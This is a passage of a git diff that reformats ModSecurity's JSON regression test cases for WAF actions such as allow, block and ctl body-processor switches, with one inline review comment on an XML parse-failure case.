.../variable-REQBODY_PROCESSOR.json | 211 +- .../variable-REQBODY_PROCESSOR_ERROR.json | 158 +- .../regression/variable-REQUEST_BASENAME.json | 116 +- 
.../regression/variable-REQUEST_BODY.json | 63 +- .../variable-REQUEST_BODY_LENGTH.json | 63 +- .../regression/variable-REQUEST_COOKIES.json | 373 +- .../variable-REQUEST_COOKIES_NAMES.json | 251 +- .../regression/variable-REQUEST_FILENAME.json | 58 +- .../regression/variable-REQUEST_HEADERS.json | 63 +- .../variable-REQUEST_HEADERS_NAMES.json | 354 +- .../regression/variable-REQUEST_LINE.json | 167 +- .../regression/variable-REQUEST_METHOD.json | 61 +- .../regression/variable-REQUEST_PROTOCOL.json | 61 +- .../regression/variable-REQUEST_URI.json | 167 +- .../regression/variable-REQUEST_URI_RAW.json | 167 +- .../regression/variable-RESPONSE_BODY.json | 39 +- .../variable-RESPONSE_CONTENT_LENGTH.json | 61 +- .../variable-RESPONSE_CONTENT_TYPE.json | 61 +- .../regression/variable-RESPONSE_HEADERS.json | 63 +- .../variable-RESPONSE_HEADERS_NAMES.json | 177 +- .../variable-RESPONSE_PROTOCOL.json | 65 +- test/test-cases/regression/variable-RULE.json | 386 +- .../regression/variable-SERVER_ADDR.json | 116 +- .../regression/variable-SERVER_NAME.json | 127 +- .../regression/variable-SERVER_PORT.json | 116 +- .../regression/variable-SESSIONID.json | 104 +- .../regression/variable-STATUS.json | 102 +- test/test-cases/regression/variable-TIME.json | 58 +- .../regression/variable-TIME_DAY.json | 58 +- .../regression/variable-TIME_EPOCH.json | 58 +- .../regression/variable-TIME_HOUR.json | 58 +- .../regression/variable-TIME_MIN.json | 58 +- .../regression/variable-TIME_MON.json | 59 +- .../regression/variable-TIME_SEC.json | 58 +- .../regression/variable-TIME_WDAY.json | 58 +- .../regression/variable-TIME_YEAR.json | 58 +- test/test-cases/regression/variable-TX.json | 340 +- .../regression/variable-UNIQUE_ID.json | 58 +- .../regression/variable-URLENCODED_ERROR.json | 412 +- .../regression/variable-USERID.json | 104 +- .../regression/variable-WEBAPPID.json | 103 +- .../variable-WEBSERVER_ERROR_LOG.json | 43 +- test/test-cases/regression/variable-XML.json | 890 +-- 
.../regression/variable-variation-count.json | 81 +- .../variable-variation-exclusion.json | 174 +- 195 files changed, 22639 insertions(+), 19363 deletions(-) diff --git a/test/test-cases/regression/action-allow.json b/test/test-cases/regression/action-allow.json index 357d451bca..6f1e358a79 100644 --- a/test/test-cases/regression/action-allow.json +++ b/test/test-cases/regression/action-allow.json 
@@ -1,98 +1,129 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing allow action (1/3)", - "expected":{ - "debug_log": "Skipped rule id 'action-allow.json:3' as request trough the utilization of an `allow' action", - "http_code": 200 + "enabled": 1, + "version_min": 300000, + "title": "Testing allow action (1/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "rules":[ + "expected": { + "debug_log": "Skipped rule id 'action-allow.json:3' as request trough the utilization of an `allow' action", + "http_code": 200 + }, + "rules": [ "SecRuleEngine On", "SecAction \"phase:1,allow,msg:'ALLOWED',id:500065\"", "SecAction \"phase:1,deny,msg:'DENIED',id:500066\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing allow action (2/3)", - "expected":{ - "debug_log": "", - "http_code": 500 + "enabled": 1, + "version_min": 300000, + "title": "Testing allow action (2/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + 
"Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 500 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"phase:1,allow:request,msg:'ALLOWED',id:500065\"", "SecRule ARGS \"@contains value\" \"id:1,t:trim,status:500,deny,phase:3\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing allow action (3/3)", - "expected":{ - "debug_log": "", - "http_code": 500 + "enabled": 1, + "version_min": 300000, + "title": "Testing allow action (3/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 500 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"phase:1,allow:phase,msg:'ALLOWED',id:500065\"", "SecRule ARGS \"@contains value\" \"id:1,t:trim,status:500,deny,phase:3\"" diff --git a/test/test-cases/regression/action-block.json b/test/test-cases/regression/action-block.json index 239df02715..33c8fb8ceb 100644 --- a/test/test-cases/regression/action-block.json 
+++ b/test/test-cases/regression/action-block.json 
@@ -1,63 +1,86 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing 'block' action without desruptive action", - "expected":{ - "parser_error": "Line: 1. Column: 16. SecDefaultAction must specify a disruptive action." + "enabled": 1, + "version_min": 300000, + "title": "Testing 'block' action without desruptive action", + "client": { + "ip": "200.249.12.31", + "port": 12300 }, - "client":{ - "ip":"200.249.12.31", - "port":12300 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"a.b.com", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "a.b.com", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/path1", - "method":"GET" + "uri": "/path1", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "http_code": 200, + "parser_error": "Line: 1. Column: 16. SecDefaultAction must specify a disruptive action." 
}, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:1,log,block,status:404\"", "SecRule REQUEST_URI \"@contains path1\" \"phase:1,block,id:5\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing 'block' action with desruptive action", - "expected":{ - "http_code": 400 + "enabled": 1, + "version_min": 300000, + "title": "Testing 'block' action with desruptive action", + "client": { + "ip": "200.249.12.31", + "port": 12300 }, - "client":{ - "ip":"200.249.12.31", - "port":12300 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"a.b.com", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "a.b.com", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/path1", - "method":"GET" + "uri": "/path1", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "http_code": 400 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:1,log,block,deny,status:400\"", "SecRule REQUEST_URI \"@contains path1\" \"phase:1,block,id:5\"" diff --git a/test/test-cases/regression/action-ctl_audit_engine.json b/test/test-cases/regression/action-ctl_audit_engine.json index 3848ee7e55..de83e8b8ab 100644 --- a/test/test-cases/regression/action-ctl_audit_engine.json +++ b/test/test-cases/regression/action-ctl_audit_engine.json 
@@ -15,8 +15,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -25,14 +25,23 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?parm1=test1&parm2=test2", + "uri": "/test.pl?parm1=test1&parm2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, "expected": { "audit_log": "--A--", - "error_log": "", "http_code": 200 }, "rules": [ diff --git a/test/test-cases/regression/action-ctl_request_body_access.json b/test/test-cases/regression/action-ctl_request_body_access.json index a88a8a24b6..fb6b3dce18 100644 --- a/test/test-cases/regression/action-ctl_request_body_access.json +++ b/test/test-cases/regression/action-ctl_request_body_access.json 
@@ -1,28 +1,28 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRequestBodyAccess (1)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyAccess (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/test", - "method":"POST", - "body":[ + "uri": "/test", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -40,20 +40,21 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Request body processing is enabled, but disabled to this transaction due to ctl:requestBodyAccess action" + "expected": { + "debug_log": "Request body processing is enabled, but disabled to this transaction due to ctl:requestBodyAccess action", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RequestBodyAccess=Off\"", 
@@ -61,29 +62,29 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRequestBodyAccess (2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyAccess (2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/test", - "method":"POST", - "body":[ + "uri": "/test", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -101,20 +102,21 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"--------------------------756b6d74fa1a8ee2" + "expected": { + "debug_log": "--------------------------756b6d74fa1a8ee2", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim\"", 
@@ -122,29 +124,29 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRequestBodyAccess (3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyAccess (3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/test", - "method":"POST", - "body":[ + "uri": "/test", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -162,20 +164,21 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"--------------------------756b6d74fa1a8ee2" + "expected": { + "debug_log": "--------------------------756b6d74fa1a8ee2", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess Off", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RequestBodyAccess=On\"", 
diff --git a/test/test-cases/regression/action-ctl_request_body_processor.json b/test/test-cases/regression/action-ctl_request_body_processor.json index 52cfc2e651..991b2ddf1c 100644 --- a/test/test-cases/regression/action-ctl_request_body_processor.json +++ b/test/test-cases/regression/action-ctl_request_body_processor.json 
@@ -1,178 +1,199 @@ [ { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing CtlRequestBodyProcessor=XML (1)", - "expected":{ - "debug_log": "Registered XML namespace href \"http://schemas.xmlsoap.org/soap/envelope/\" prefix \"soap\"" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyProcessor=XML (1)", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", "", "", - "Everyday Italian", - "Giada De Laurentiis", - "2005", - "30.00", + "Everyday Italian", + "Giada De Laurentiis", + "2005", + "30.00", "", - "", - "Harry Potter", - "J K. Rowling", - "2005", - "29.99", + "Harry Potter", + "J K. Rowling", + "2005", + "29.99", "", - "", - "XQuery Kick Start", - "James McGovern", - "Per Bothner", - "Kurt Cagle", - "James Linn", - "Vaidyanathan Nagarajan", - "2003", - "49.99", + "XQuery Kick Start", + "James McGovern", + "Per Bothner", + "Kurt Cagle", + "James Linn", + "Vaidyanathan Nagarajan", + "2003", + "49.99", "", - "", - "Learning XML", - "Erik T. Ray", - "2003", - "39.95", + "Learning XML", + "Erik T. 
Ray", + "2003", + "39.95", "", "" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Registered XML namespace href \"http://schemas.xmlsoap.org/soap/envelope/\" prefix \"soap\"", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing CtlRequestBodyProcessor=XML (2)", - "expected":{ - "debug_log": "Rule returned 0" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyProcessor=XML (2)", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", "", "", - "Everyday Italian", - "Giada De Laurentiis", - "2005", - "30.00", + "Everyday Italian", + "Giada De Laurentiis", + "2005", + "30.00", "", - "", - "Harry 
Potter", - "J K. Rowling", - "2005", - "29.99", + "Harry Potter", + "J K. Rowling", + "2005", + "29.99", "", - "", - "XQuery Kick Start", - "James McGovern", - "Per Bothner", - "Kurt Cagle", - "James Linn", - "Vaidyanathan Nagarajan", - "2003", - "49.99", + "XQuery Kick Start", + "James McGovern", + "Per Bothner", + "Kurt Cagle", + "James Linn", + "Vaidyanathan Nagarajan", + "2003", + "49.99", "", - "", - "Learning XML", - "Erik T. Ray", - "2003", - "39.95", + "Learning XML", + "Erik T. Ray", + "2003", + "39.95", "", "" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 0", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" ] }, - { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing CtlRequestBodyProcessor=XML (3)", - "expected":{ - "debug_log": "XML: Failed to parse document." 
+ { + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyProcessor=XML (3)", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "not a xml" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "XML: Failed to parse document.", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" ] } ] diff --git a/test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json b/test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json index 2ad6093e84..cd523bc649 100644 --- a/test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json +++ b/test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json 
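Review bot: Case (3) now pins `"http_code": 200` for a body the XML processor rejects (`"not a xml"`, expected log `XML: Failed to parse document.`), which records the pass-through outcome without saying that it follows from the rule set having no rule on the parse error. The fixture format shows no comment field, so I would put that in the title, e.g. `"title": "Testing CtlRequestBodyProcessor=XML (3) - parse failure, no REQBODY_ERROR rule"`. Unless it is covered elsewhere in the suite, a sibling case whose rules add `SecRule REQBODY_ERROR "!@eq 0" "id:124,phase:2,t:none,deny,status:400"` (id and status are illustrative) and expect `"http_code": 400` would also cover the configuration that rejects an unparseable body.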
@@ -1,97 +1,97 @@ [ { - "enabled":1, - "version_min":300000, - "title":"ctl:requestBodyProcessor=URLENCODED", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "ctl:requestBodyProcessor=URLENCODED", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded", - "method":"POST", - "body":[ - "param1=value1\r" + "uri": "/a=urlencoded", + "method": "POST", + "body": [ + "param1=value1\r" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"Target value: \\\"value1", + "expected": { + "debug_log": "Target value: \\\"value1", "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"@contains lhebs\" \"phase:1,id:122,t:none,log,auditlog,pass,ctl:requestBodyProcessor=URLENCODED\"", - "SecRule ARGS_POST \"@contains value1\" \"phase:2,id:123,t:none,deny,log,auditlog\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"@contains lhebs\" \"phase:1,id:122,t:none,log,auditlog,pass,ctl:requestBodyProcessor=URLENCODED\"", + "SecRule ARGS_POST \"@contains value1\" \"phase:2,id:123,t:none,deny,log,auditlog\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"ctl:requestBodyProcessor=URLENCODED", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "ctl:requestBodyProcessor=URLENCODED", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/x-www-form-urlencoded", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "application/x-www-form-urlencoded", + "Expect": "100-continue" }, - "uri":"/a=urlencoded", - "method":"POST", - "body":[ - "param1=value1\r" + "uri": "/a=urlencoded", + "method": "POST", + "body": [ + "param1=value1\r" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": 
"text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Target value: \\\"value1", + "expected": { + "debug_log": "Target value: \\\"value1", "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule ARGS_POST \"@contains value1\" \"phase:2,id:123,t:none,deny,log,auditlog\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule ARGS_POST \"@contains value1\" \"phase:2,id:123,t:none,deny,log,auditlog\"" ] } ] diff --git a/test/test-cases/regression/action-ctl_rule_engine.json b/test/test-cases/regression/action-ctl_rule_engine.json index 927b7077e8..bab93e2448 100644 --- a/test/test-cases/regression/action-ctl_rule_engine.json +++ b/test/test-cases/regression/action-ctl_rule_engine.json 
@@ -1,44 +1,46 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (1)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"POST", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "POST", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no 